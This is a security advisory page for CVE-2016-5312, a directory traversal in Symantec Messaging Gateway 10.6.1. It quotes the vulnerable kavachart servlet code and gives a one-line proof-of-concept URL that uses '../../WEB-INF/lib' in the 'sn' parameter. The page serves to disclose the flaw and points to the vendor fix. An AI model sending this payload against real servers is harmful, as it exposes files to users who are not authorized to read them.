Symantec Messaging Gateway <= 10.6.1 Directory Traversal

2016.09.29
Credit: R-73eN
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal # Date : 28/09/2016 # Author : R-73eN # Tested on : Symantec Messaging Gateway 10.6.1 (Latest) # Software : https://www.symantec.com/products/threat-protection/messaging-gateway # Vendor : Symantec # CVE : CVE-2016-5312 # Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00 # # ___ __ ____ _ _ # |_ _|_ __ / _| ___ / ___| ___ _ __ / | | # | || '_ | |_ / _ | | _ / _ '_ / _ | | # | || | | | _| (_) | |_| | __/ | | | / ___ | |___ # |___|_| |_|_| ___/ ____|___|_| |_| /_/ ______| # # # DESCRIPTION: # # A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests. # This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory. # This could potentially provide read access to some files/directories on the server for which the user is not authorized. # The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java The vulnerable code is extends HttpServlet { public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) { block6 : { try { String string = httpServletRequest.getParameter("sn"); //**** Taking parameter "sn" and writing it to the "string variable" if (string == null) break block6; String string2 = string.substring(string.length() - 3); byte[] arrby = (byte[])this.getServletContext().getAttribute(string); //**** The string variable is passed here without any sanitanization for directory traversal //**** and you can successfully use this to do a directory traversal. if (arrby != null) { httpServletResponse.setContentType("image/" + string2); ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream(); httpServletResponse.setContentLength(arrby.length); servletOutputStream.write(arrby); this.getServletContext().removeAttribute(string); break block6; } POC: https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib

References:

https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top